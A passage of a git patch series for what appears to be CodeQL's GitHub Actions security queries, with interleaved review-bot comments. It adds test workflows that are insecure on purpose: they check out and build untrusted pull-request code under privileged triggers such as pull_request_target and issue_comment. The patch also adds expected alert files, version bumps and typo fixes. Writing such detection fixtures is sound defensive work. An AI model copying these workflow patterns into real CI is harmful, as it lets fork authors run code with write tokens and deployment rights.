.github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| 
.github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | 
@@ -104,6 +156,11 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | #select +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the 
default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 000000000000..6900c3bc23fa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml 
@@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
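Review bot: This file is a byte-identical copy of the CWE-349 fixture added earlier in the same commit (both hunks carry blob `6900c3bc23fa`), and the same holds for poc2.yml (`5501beb9ea2f`) and poc3.yml (`4d5ae1f528cd`). If the test layout requires fixtures to live under each query's directory, add a header to each copy naming its twin, e.g. `# Keep in sync with ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml`, so a later tweak to one does not silently desynchronise the two expected files; otherwise a single shared workflows directory would remove the duplication. Since the CWE-829 side is about the untrusted checkout rather than the cache write, that header should also say which alert this copy is expected to raise (its UntrustedCheckoutCritical.expected hunk starts past the end of this view).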
@@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml 
@@ -0,0 +1,64 @@
+name: Publish
+
+on:
+ push:
+ branches:
+ - main
+ pull_request_target:
+ workflow_dispatch:
+ workflow_call:
+
+jobs:
+ build-and-upload:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+
+ - name: Checkout PR
+ if: ${{ github.event_name == 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Checkout
+ if: ${{ github.event_name != 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: main
+
+ - name: Setup Pages
+ uses: actions/configure-pages@v1
+ - name: Use Node.js
+ uses: actions/setup-node@v3
+ with:
+ node-version: 18
+ cache: npm
+ - name: Update npm to latest
+ run: npm i --prefer-online --no-fund --no-audit -g npm@latest
+ - run: npm -v
+ - run: npm i --ignore-scripts --no-audit --no-fund --package-lock
+ - run: npm run build -w www
+ - name: Upload artifact
+ uses: actions/upload-pages-artifact@v1
+ with:
+ path: './workspaces/www/build'
+
+ deploy:
+ runs-on: ubuntu-latest
+ needs: build-and-upload
+ environment:
+ name: github-pages
+ url: ${{ steps.deployment.outputs.page_url }}
+ permissions:
+ pages: write
+ id-token: write
+ outputs:
+ deployment_url: ${{ steps.deployment.outputs.page_url }}
+ steps:
+ - name: Deploy to GitHub Pages
+ id: deployment
+ uses: actions/deploy-pages@v1
+ with:
+ preview: ${{ github.event_name == 'pull_request_target' }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml
new file mode 100644
index 000000000000..96fd8bdd1a4b
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml
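Review bot: Only the Medium expectations in this series flag the `Checkout PR` step (line 18), yet the same job then runs `npm run build -w www` (line 42) on the head of `github.event.pull_request.head.repo.full_name` checked out under `pull_request_target`, which executes the `build` script from that fork's package.json; `--ignore-scripts` on the preceding install does not apply to `npm run`. The resulting artifact feeds the `deploy` job, which has `pages: write` and `id-token: write`. If the case is intended to stay Medium-only because the build job declares `contents: read`, a header comment should record that, e.g. `# Test fixture: pull_request_target checkout of the PR head followed by npm run build; job permissions are read-only, so expected in UntrustedCheckoutMedium only.`; if not, it looks like a gap in the Critical query's poisonable-step detection worth tracking.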
@@ -0,0 +1,37 @@
+name: Tests
+on:
+ push:
+ branches:
+ - master
+ pull_request:
+ workflow_dispatch:
+
+jobs:
+ tests:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Fetch CodeQL
+ shell: bash
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ gh extension install github/gh-codeql
+ gh codeql set-channel "nightly"
+ gh codeql version
+ printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}"
+ gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}"
+ gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}"
+ - name: Install Packs
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ gh repo clone github/codeql
+ codeql pack install "ql/lib"
+ codeql pack install "ql/src"
+ codeql pack install "ql/test"
+ - name: Run Tests
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ codeql test run ql/test
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 29b311435dd5..57efc8af35dc 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -198,6 +198,58 @@ edges | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| 
.github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| 
.github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run 
Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -242,6 +294,12 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | 
@@ -261,5 +319,7 @@ edges | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 5bf0e56e1b77..61c328b7011d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,7 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 4aba07074c8b17e9a276216911475eb27749d57c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:45:13 +0200 Subject: [PATCH 353/707] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 847a7b83e541..5369af754891 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.5 +version: 0.1.6 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index be2b4e428c98..a019dd6f6959 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.5 +version: 0.1.6 groups: [actions, queries] suites: codeql-suites extractor: javascript 
From 5997038923a8d7b0d36c175f569974f576aad4f3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 27 Jun 2024 11:07:02 +0200
Subject: [PATCH 354/707] Exclude self-hosted query from CodeScanning suite
---
ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 2 ++
1 file changed, 2 insertions(+)
diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
index 621b7fb050db..b32fe4068772 100644
--- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
+++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
@@ -9,6 +9,8 @@
 * @tags actions
 * security
 * external/cwe/cwe-284
+ * testing
+ * experimental
 */
 import codeql.actions.security.SelfHostedQuery
From d11c15dc287049b8afec4c6c0d10a163d9739c04 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 27 Jun 2024 11:07:55 +0200
Subject: [PATCH 355/707] Bump qlpack versionsi
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 5369af754891..b2b92e45e7af 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.6
+version: 0.1.7
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index a019dd6f6959..899f62cf9ba4 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.6
+version: 0.1.7
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From eeba26a647b5d8d7a2c6f316f159ecccac87711d Mon Sep 17 00:00:00 2001
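Review bot: The two new tags on `CodeExecutionOnSelfHostedRunner.ql` only achieve what the subject line promises if `codeql-suites/actions-code-scanning.qls` excludes queries tagged `experimental` or `testing`, and that suite is not touched by this commit, so the dependency is invisible to the next reader of the query. A line in the metadata block, ` * (tagged experimental/testing so the default code-scanning suite skips this query)`, would record the intent; if the suite has no matching `exclude:` rule yet, it belongs in the same change. The `@tags` block starts outside the hunk.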
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:55:21 +0200 Subject: [PATCH 356/707] fix typos --- ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index b71b3cbba99e..9f7f3fd8ceef 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind path-problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 9faab24dbcbe..980560dac9a3 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * 